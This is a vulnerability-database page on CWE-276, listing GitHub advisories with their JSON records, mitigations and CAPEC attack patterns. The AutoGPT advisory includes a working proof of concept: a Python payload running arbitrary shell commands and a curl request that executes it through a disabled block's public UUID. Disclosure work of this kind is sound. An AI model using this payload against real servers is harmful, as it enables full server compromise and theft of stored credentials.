CWE-276
AllowedIncorrect Default Permissions
Abstraction: Base · Status: Draft
During installation, installed file permissions are set to allow anyone to modify those files.
2035 vulnerabilities reference this CWE, most recent first.
GHSA-R277-3XC5-C79V
Vulnerability from github – Published: 2026-01-29 15:04 – Updated: 2026-01-30 00:04Summary
AutoGPT Platform's block execution endpoints (both main web API and external API) allow executing blocks by UUID without checking the disabled flag. Any authenticated user can execute the disabled BlockInstallationBlock, which writes arbitrary Python code to the server filesystem and executes it via __import__(), achieving Remote Code Execution. In default self-hosted deployments where Supabase signup is enabled, an attacker can self-register; if signup is disabled (e.g., hosted), the attacker needs an existing account.
Details
Two vulnerable endpoints exist:
- Main Web API (
v1.py#L355-395) - Any authenticated user:
@v1_router.post(
path="/blocks/{block_id}/execute",
dependencies=[Security(requires_user)], # Just requires login
)
async def execute_graph_block(block_id: str, data: BlockInput, ...):
obj = get_block(block_id)
if not obj:
raise HTTPException(status_code=404, ...)
# NO CHECK FOR obj.disabled!
async for name, data in obj.execute(data, ...):
output[name].append(data)
- External API (
external/v1/routes.py#L79-93) - Same issue.
The external API is gated by API key permissions, but any authenticated user can mint API keys with arbitrary permissions via the main API (including EXECUTE_BLOCK) at v1.py#L1408-1424. As a result, a low-privilege user can create an API key and invoke the external block execution route.
The disabled flag is documented but not enforced:
From block.py#L459:
"disabled: If the block is disabled, it will not be available for execution."
The block listing endpoint correctly filters disabled blocks (if not b.disabled), but the execution endpoints do not check this flag.
The dangerous block (blocks/block.py#L15-78):
class BlockInstallationBlock(Block):
"""
NOTE: This block allows remote code execution on the server,
and it should be used for development purposes only.
"""
def __init__(self):
super().__init__(
id="45e78db5-03e9-447f-9395-308d712f5f08", # Hardcoded, public UUID
disabled=True, # NOT ENFORCED!
)
async def run(self, input_data: Input, **kwargs) -> BlockOutput:
code = input_data.code
# Writes attacker code to server filesystem
file_path = f"{block_dir}/{file_name}.py"
with open(file_path, "w") as f:
f.write(code)
# Executes via import (RCE)
module = __import__(module_name, fromlist=[class_name])
PoC
1. Create malicious block code
PAYLOAD = '''
import os
from backend.data.block import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput
from backend.data.model import SchemaField
class RCEBlock(Block):
class Input(BlockSchemaInput):
cmd: str = SchemaField(description="Command")
class Output(BlockSchemaOutput):
result: str = SchemaField(description="Result")
def __init__(self):
super().__init__(
id="aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
description="RCE",
input_schema=self.Input,
output_schema=self.Output,
)
async def run(self, input_data, **kwargs):
import subprocess
result = subprocess.check_output(input_data.cmd, shell=True).decode()
yield "result", result
'''
2. Execute via main web API (any logged-in user)
# Get session cookie by logging into the web UI, then:
curl -X POST "https://platform.autogpt.app/api/blocks/45e78db5-03e9-447f-9395-308d712f5f08/execute" \
-H "Cookie: session=<your_session_cookie>" \
-H "Content-Type: application/json" \
-d '{"code": "<PAYLOAD>"}'
The malicious Python code is written to the server's backend/blocks/ directory and immediately executed via __import__().
Alternative route: Mint an API key with EXECUTE_BLOCK via POST /api-keys, then call the external API POST /external-api/v1/blocks/{id}/execute.
Impact
Any user who can create an account on AutoGPT Platform can achieve full Remote Code Execution on the backend server.
This allows: - Complete server compromise - Access to all user data, credentials, and API keys stored in the database - Access to environment variables (cloud credentials, secrets) - Lateral movement to connected infrastructure (Redis, PostgreSQL, cloud services) - Persistent backdoor installation
Attack requirements:
- Create a free account on the platform (default self-hosted enables signup; hosted deployments may disable signup, requiring an existing account)
- Know the disabled block's UUID (hardcoded in public source code: 45e78db5-03e9-447f-9395-308d712f5f08)
Why the disabled flag exists but fails:
- Block listing correctly filters disabled blocks (users don't see them in UI)
- Execution endpoints bypass this check entirely
- The UUID is static and publicly known from the open-source codebase
Severity note: CVSS assumes the default self-hosted configuration where signup is enabled (low-privilege authentication is easy to obtain). If signup is disabled in a hosted deployment, likelihood is lower, but impact remains critical once any authenticated account exists.
A fix is available, but was not published to the PyPI registry at time of publication: 0.6.44
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "agpt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.2.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-24780"
],
"database_specific": {
"cwe_ids": [
"CWE-276",
"CWE-863",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-29T15:04:03Z",
"nvd_published_at": "2026-01-29T18:16:17Z",
"severity": "HIGH"
},
"details": "### Summary\n\nAutoGPT Platform\u0027s block execution endpoints (both main web API and external API) allow executing blocks by UUID without checking the `disabled` flag. Any authenticated user can execute the disabled `BlockInstallationBlock`, which writes arbitrary Python code to the server filesystem and executes it via `__import__()`, achieving Remote Code Execution. In default self-hosted deployments where Supabase signup is enabled, an attacker can self-register; if signup is disabled (e.g., hosted), the attacker needs an existing account.\n\n### Details\n\n**Two vulnerable endpoints exist:**\n\n1. **Main Web API** ([`v1.py#L355-395`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L355-L395)) - Any authenticated user:\n\n```python\n@v1_router.post(\n path=\"/blocks/{block_id}/execute\",\n dependencies=[Security(requires_user)], # Just requires login\n)\nasync def execute_graph_block(block_id: str, data: BlockInput, ...):\n obj = get_block(block_id)\n if not obj:\n raise HTTPException(status_code=404, ...)\n\n # NO CHECK FOR obj.disabled!\n\n async for name, data in obj.execute(data, ...):\n output[name].append(data)\n```\n\n2. **External API** ([`external/v1/routes.py#L79-93`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/external/v1/routes.py#L79-L93)) - Same issue.\n\nThe external API is gated by API key permissions, but any authenticated user can mint API keys with arbitrary permissions via the main API (including `EXECUTE_BLOCK`) at [`v1.py#L1408-1424`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L1408-L1424). As a result, a low-privilege user can create an API key and invoke the external block execution route.\n\n**The disabled flag is documented but not enforced:**\n\nFrom [`block.py#L459`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/data/block.py#L459):\n\u003e \"disabled: If the block is disabled, it will not be available for execution.\"\n\nThe block listing endpoint correctly filters disabled blocks (`if not b.disabled`), but the execution endpoints do not check this flag.\n\n**The dangerous block ([`blocks/block.py#L15-78`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/blocks/block.py#L15-L78)):**\n\n```python\nclass BlockInstallationBlock(Block):\n \"\"\"\n NOTE: This block allows remote code execution on the server,\n and it should be used for development purposes only.\n \"\"\"\n\n def __init__(self):\n super().__init__(\n id=\"45e78db5-03e9-447f-9395-308d712f5f08\", # Hardcoded, public UUID\n disabled=True, # NOT ENFORCED!\n )\n\n async def run(self, input_data: Input, **kwargs) -\u003e BlockOutput:\n code = input_data.code\n\n # Writes attacker code to server filesystem\n file_path = f\"{block_dir}/{file_name}.py\"\n with open(file_path, \"w\") as f:\n f.write(code)\n\n # Executes via import (RCE)\n module = __import__(module_name, fromlist=[class_name])\n```\n\n### PoC\n\n**1. Create malicious block code**\n\n```python\nPAYLOAD = \u0027\u0027\u0027\nimport os\nfrom backend.data.block import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput\nfrom backend.data.model import SchemaField\n\nclass RCEBlock(Block):\n class Input(BlockSchemaInput):\n cmd: str = SchemaField(description=\"Command\")\n class Output(BlockSchemaOutput):\n result: str = SchemaField(description=\"Result\")\n\n def __init__(self):\n super().__init__(\n id=\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\n description=\"RCE\",\n input_schema=self.Input,\n output_schema=self.Output,\n )\n\n async def run(self, input_data, **kwargs):\n import subprocess\n result = subprocess.check_output(input_data.cmd, shell=True).decode()\n yield \"result\", result\n\u0027\u0027\u0027\n```\n\n**2. Execute via main web API (any logged-in user)**\n\n```bash\n# Get session cookie by logging into the web UI, then:\ncurl -X POST \"https://platform.autogpt.app/api/blocks/45e78db5-03e9-447f-9395-308d712f5f08/execute\" \\\n -H \"Cookie: session=\u003cyour_session_cookie\u003e\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"code\": \"\u003cPAYLOAD\u003e\"}\u0027\n```\n\nThe malicious Python code is written to the server\u0027s `backend/blocks/` directory and immediately executed via `__import__()`.\n\n**Alternative route:** Mint an API key with `EXECUTE_BLOCK` via `POST /api-keys`, then call the external API `POST /external-api/v1/blocks/{id}/execute`.\n\n### Impact\n\n**Any user who can create an account on AutoGPT Platform can achieve full Remote Code Execution on the backend server.**\n\nThis allows:\n- Complete server compromise\n- Access to all user data, credentials, and API keys stored in the database\n- Access to environment variables (cloud credentials, secrets)\n- Lateral movement to connected infrastructure (Redis, PostgreSQL, cloud services)\n- Persistent backdoor installation\n\n**Attack requirements:**\n- Create a free account on the platform (default self-hosted enables signup; hosted deployments may disable signup, requiring an existing account)\n- Know the disabled block\u0027s UUID (hardcoded in public source code: `45e78db5-03e9-447f-9395-308d712f5f08`)\n\n**Why the `disabled` flag exists but fails:**\n- Block listing correctly filters disabled blocks (users don\u0027t see them in UI)\n- Execution endpoints bypass this check entirely\n- The UUID is static and publicly known from the open-source codebase\n\n**Severity note:** CVSS assumes the default self-hosted configuration where signup is enabled (low-privilege authentication is easy to obtain). If signup is disabled in a hosted deployment, likelihood is lower, but impact remains critical once any authenticated account exists.\n\nA fix is available, but was not published to the PyPI registry at time of publication: [0.6.44](https://github.com/Significant-Gravitas/AutoGPT/releases/tag/v0.6.44)",
"id": "GHSA-r277-3xc5-c79v",
"modified": "2026-01-30T00:04:18Z",
"published": "2026-01-29T15:04:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-r277-3xc5-c79v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24780"
},
{
"type": "PACKAGE",
"url": "https://github.com/Significant-Gravitas/AutoGPT"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/external/v1/routes.py#L79-L93"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L1408-L1424"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L355-L395"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/blocks/block.py#L15-L78"
},
{
"type": "WEB",
"url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/data/block.py#L459"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P",
"type": "CVSS_V4"
}
],
"summary": "AutoGPT is Vulnerable to RCE via Disabled Block Execution"
}
GHSA-R295-R6MQ-X42C
Vulnerability from github – Published: 2023-04-14 21:30 – Updated: 2024-04-04 03:28An issue found in DUALSPACE Lock Master v.2.2.4 allows a local attacker to cause a denial of service or gain sensitive information via the com.ludashi.superlock.util.pref.SharedPrefProviderEntryMethod: insert of the android.net.Uri.insert method.
{
"affected": [],
"aliases": [
"CVE-2023-27647"
],
"database_specific": {
"cwe_ids": [
"CWE-276"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-04-14T20:15:00Z",
"severity": "HIGH"
},
"details": "An issue found in DUALSPACE Lock Master v.2.2.4 allows a local attacker to cause a denial of service or gain sensitive information via the com.ludashi.superlock.util.pref.SharedPrefProviderEntryMethod: insert of the android.net.Uri.insert method.",
"id": "GHSA-r295-r6mq-x42c",
"modified": "2024-04-04T03:28:48Z",
"published": "2023-04-14T21:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27647"
},
{
"type": "WEB",
"url": "https://app-lock-master.en.uptodown.com/android/download"
},
{
"type": "WEB",
"url": "https://github.com/LianKee/SODA/blob/main/CVEs/CVE-2023-27647/CVE%20detail.md"
},
{
"type": "WEB",
"url": "http://www.dualspace.com/pc/en/products.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-R2C6-QQCH-5CCC
Vulnerability from github – Published: 2022-08-13 00:00 – Updated: 2022-08-14 00:00In bluetooth, there is a possible way to enable or disable bluetooth connection without user consent due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-211646835
{
"affected": [],
"aliases": [
"CVE-2022-20267"
],
"database_specific": {
"cwe_ids": [
"CWE-276"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-12T15:15:00Z",
"severity": "LOW"
},
"details": "In bluetooth, there is a possible way to enable or disable bluetooth connection without user consent due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-211646835",
"id": "GHSA-r2c6-qqch-5ccc",
"modified": "2022-08-14T00:00:20Z",
"published": "2022-08-13T00:00:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-20267"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/android-13"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-R2WG-439C-8PCQ
Vulnerability from github – Published: 2022-05-13 01:53 – Updated: 2022-05-13 01:53A write protection lock bit was left unset after boot on an older generation of Lenovo and IBM System x servers, potentially allowing an attacker with administrator access to modify the subset of flash memory containing Intel Server Platform Services (SPS) and the system Flash Descriptors.
{
"affected": [],
"aliases": [
"CVE-2018-9085"
],
"database_specific": {
"cwe_ids": [
"CWE-276"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-11-16T14:29:00Z",
"severity": "MODERATE"
},
"details": "A write protection lock bit was left unset after boot on an older generation of Lenovo and IBM System x servers, potentially allowing an attacker with administrator access to modify the subset of flash memory containing Intel Server Platform Services (SPS) and the system Flash Descriptors.",
"id": "GHSA-r2wg-439c-8pcq",
"modified": "2022-05-13T01:53:52Z",
"published": "2022-05-13T01:53:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-9085"
},
{
"type": "WEB",
"url": "https://support.lenovo.com/us/en/solutions/LEN-24477"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-R2X6-CJG7-8R43
Vulnerability from github – Published: 2025-01-29 20:49 – Updated: 2025-04-09 20:11Issue
Snowflake discovered and remediated a vulnerability in the Snowflake Connector for Python. On Linux systems, when temporary credential caching is enabled, the Snowflake Connector for Python will cache temporary credentials locally in a world-readable file.
This vulnerability affects versions 2.3.7 through 3.13.0. Snowflake fixed the issue in version 3.13.1.
Vulnerability Details
On Linux, when either EXTERNALBROWSER or USERNAME_PASSWORD_MFA authentication methods are used with temporary credential caching enabled, the Snowflake Connector for Python will cache the temporary credentials in a local file. In the vulnerable versions of the Driver, this file is created with world-readable permissions.
Solution
Snowflake released version 3.13.1 of the Snowflake Connector for Python, which fixes this issue. We recommend users upgrade to version 3.13.1.
Additional Information
If you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our Vulnerability Disclosure Policy.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.0"
},
"package": {
"ecosystem": "PyPI",
"name": "snowflake-connector-python"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.7"
},
{
"fixed": "3.13.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-24795"
],
"database_specific": {
"cwe_ids": [
"CWE-276"
],
"github_reviewed": true,
"github_reviewed_at": "2025-01-29T20:49:59Z",
"nvd_published_at": "2025-01-29T21:15:21Z",
"severity": "MODERATE"
},
"details": "### Issue\nSnowflake discovered and remediated a vulnerability in the Snowflake Connector for Python. On Linux systems, when temporary credential caching is enabled, the Snowflake Connector for Python will cache temporary credentials locally in a world-readable file.\n\nThis vulnerability affects versions 2.3.7 through 3.13.0. Snowflake fixed the issue in version 3.13.1.\n\n### Vulnerability Details\nOn Linux, when either EXTERNALBROWSER or USERNAME_PASSWORD_MFA authentication methods are used with temporary credential caching enabled, the Snowflake Connector for Python will cache the temporary credentials in a local file. In the vulnerable versions of the Driver, this file is created with world-readable permissions.\n\n### Solution\nSnowflake released version 3.13.1 of the Snowflake Connector for Python, which fixes this issue. We recommend users upgrade to version 3.13.1.\n\n### Additional Information\nIf you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).",
"id": "GHSA-r2x6-cjg7-8r43",
"modified": "2025-04-09T20:11:00Z",
"published": "2025-01-29T20:49:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/snowflakedb/snowflake-connector-python/security/advisories/GHSA-r2x6-cjg7-8r43"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24795"
},
{
"type": "WEB",
"url": "https://github.com/snowflakedb/snowflake-connector-python/commit/3769b43822357c3874c40f5e74068458c2dc79af"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/snowflake-connector-python/PYSEC-2025-28.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/snowflakedb/snowflake-connector-python"
},
{
"type": "WEB",
"url": "https://github.com/snowflakedb/snowflake-connector-python/releases/tag/v3.13.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "snowflake-connector-python vulnerable to insecure cache files permissions"
}
GHSA-R339-7QQ7-W52V
Vulnerability from github – Published: 2024-05-16 21:31 – Updated: 2024-05-16 21:31Incorrect default permissions in some Intel(R) GPA software installers before version 2023.3 may allow an authenticated user to potentially enable escalation of privilege via local access.
{
"affected": [],
"aliases": [
"CVE-2023-24460"
],
"database_specific": {
"cwe_ids": [
"CWE-276"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-16T21:15:50Z",
"severity": "HIGH"
},
"details": "Incorrect default permissions in some Intel(R) GPA software installers before version 2023.3 may allow an authenticated user to potentially enable escalation of privilege via local access.",
"id": "GHSA-r339-7qq7-w52v",
"modified": "2024-05-16T21:31:58Z",
"published": "2024-05-16T21:31:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24460"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00831.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-R36F-VRXF-7JF9
Vulnerability from github – Published: 2026-01-06 18:31 – Updated: 2026-01-06 18:31An issue in H3C M102G HM1A0V200R010 wireless controller and BA1500L SWBA1A0V100R006 wireless access point, there is a misconfiguration vulnerability about vsftpd. Through this vulnerability, all files uploaded anonymously via the FTP protocol is automatically owned by the root user and remote attackers could gain root-level control over the devices.
{
"affected": [],
"aliases": [
"CVE-2025-60262"
],
"database_specific": {
"cwe_ids": [
"CWE-276"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-06T16:15:51Z",
"severity": "CRITICAL"
},
"details": "An issue in H3C M102G HM1A0V200R010 wireless controller and BA1500L SWBA1A0V100R006 wireless access point, there is a misconfiguration vulnerability about vsftpd. Through this vulnerability, all files uploaded anonymously via the FTP protocol is automatically owned by the root user and remote attackers could gain root-level control over the devices.",
"id": "GHSA-r36f-vrxf-7jf9",
"modified": "2026-01-06T18:31:35Z",
"published": "2026-01-06T18:31:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60262"
},
{
"type": "WEB",
"url": "https://www.notion.so/23e54a1113e780d686fbe1624ee0465d"
},
{
"type": "WEB",
"url": "https://www.notion.so/Misconfiguration-in-H3C-23e54a1113e780d686fbe1624ee0465d"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-R36M-FWRR-9F4G
Vulnerability from github – Published: 2025-10-22 21:31 – Updated: 2025-10-22 21:31A container privilege escalation flaw was found in certain AMQ Broker images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.
{
"affected": [],
"aliases": [
"CVE-2025-58712"
],
"database_specific": {
"cwe_ids": [
"CWE-276"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-22T19:15:34Z",
"severity": "MODERATE"
},
"details": "A container privilege escalation flaw was found in certain AMQ Broker images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.",
"id": "GHSA-r36m-fwrr-9f4g",
"modified": "2025-10-22T21:31:33Z",
"published": "2025-10-22T21:31:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58712"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2025:17562"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-58712"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394418"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-R3F8-88HR-W6GV
Vulnerability from github – Published: 2022-08-13 00:00 – Updated: 2022-08-16 00:00In Content, there is a possible way to check if the given account exists on the device due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-200956588
{
"affected": [],
"aliases": [
"CVE-2022-20300"
],
"database_specific": {
"cwe_ids": [
"CWE-276"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-12T15:15:00Z",
"severity": "MODERATE"
},
"details": "In Content, there is a possible way to check if the given account exists on the device due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-200956588",
"id": "GHSA-r3f8-88hr-w6gv",
"modified": "2022-08-16T00:00:22Z",
"published": "2022-08-13T00:00:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-20300"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/android-13"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-R3QQ-HHR3-7HW6
Vulnerability from github – Published: 2022-03-31 00:00 – Updated: 2022-04-06 00:01In Traceur, there is a possible bypass of developer settings requirements for capturing system traces due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-204992293
{
"affected": [],
"aliases": [
"CVE-2021-39780"
],
"database_specific": {
"cwe_ids": [
"CWE-276"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-03-30T16:15:00Z",
"severity": "HIGH"
},
"details": "In Traceur, there is a possible bypass of developer settings requirements for capturing system traces due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-204992293",
"id": "GHSA-r3qq-hhr3-7hw6",
"modified": "2022-04-06T00:01:50Z",
"published": "2022-03-31T00:00:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39780"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/android-12l"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-1
The architecture needs to access and modification attributes for files to only those users who actually require those actions.
Mitigation MIT-46
Strategy: Separation of Privilege
- Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
- Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.
CAPEC-127: Directory Indexing
An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.
CAPEC-81: Web Server Logs Tampering
Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.